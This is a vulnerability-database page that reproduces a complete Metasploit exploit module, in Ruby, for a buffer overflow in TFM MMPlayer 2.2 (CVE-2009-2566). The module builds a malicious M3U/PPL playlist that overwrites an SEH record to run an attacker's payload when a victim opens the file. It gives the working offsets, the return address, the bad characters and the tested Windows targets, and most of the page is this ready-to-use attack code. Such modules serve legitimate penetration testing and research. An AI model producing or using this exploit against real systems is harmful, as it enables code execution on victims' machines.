Lucene search
K

TFM MMPlayer (m3u/ppl File) Buffer Overflow

🗓️ 13 Jun 2012 04:20:12Reported by RjRjh Hack3r, bcoles <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 398 Views

TFM MMPlayer Buffer Overflow in M3U/PPL File

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-2566
30 Jun 200900:00
circl
CVE
CVE-2009-2566
21 Jul 200922:00
cve
Cvelist
CVE-2009-2566
21 Jul 200922:00
cvelist
NVD
CVE-2009-2566
21 Jul 200922:30
nvd
OpenVAS
TFM MMPlayer '.m3u' Buffer Overflow Vulnerability (Jul 2009)
29 Jul 200900:00
openvas
OpenVAS
TFM MMPlayer '.m3u' Buffer Overflow Vulnerability - July-09
29 Jul 200900:00
openvas
Prion
Stack overflow
21 Jul 200922:30
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in MMPlayer 2.2
        The vulnerability is triggered when opening a malformed M3U/PPL file
        that contains an overly long string, which results in overwriting a
        SEH record, thus allowing arbitrary code execution under the context
        of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'RjRjh Hack3r',                        # Original discovery and exploit
          'bcoles'  # msf exploit
        ],
      'References'     =>
        [
          [ 'CVE', '2009-2566' ],
          [ 'OSVDB', '80532' ],
          [ 'BID', '52698' ],
          [ 'EDB', '18656' ], # .m3u
          [ 'EDB', '18657' ]  # .ppl
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested on:
          # Windows XP Pro SP3 - English
          # Windows Vista SP1 - English
          # Windows 7 Home Basic SP0 - English
          # Windows 7 Ultimate SP1 - English
          # Windows Server 2003 Enterprise SP2 - English
          [ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe
        ],
      'Payload'        =>
        {
          'Size' => 4000,
          'BadChars' => "\x00\x0a\x0d",
          'DisableNops' => false
        },
      'Privileged'     => false,
      'DisclosureDate' => '2012-03-23',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.ppl'])
      ])

  end

  def exploit

    nops   = make_nops(10)
    sc     = payload.encoded
    offset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length)
    jmp    = Rex::Arch::X86.jmp(-4108)            # near jump 4103 bytes
    nseh   = Rex::Arch::X86.jmp_short(-7)         # jmp back 7 bytes
    nseh  << Rex::Text.rand_text_alphanumeric(2)
    seh    = [target.ret].pack('V')

    sploit  = nops
    sploit << sc
    sploit << offset
    sploit << jmp
    sploit << nseh
    sploit << seh

    # write file
    file_create(sploit)

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation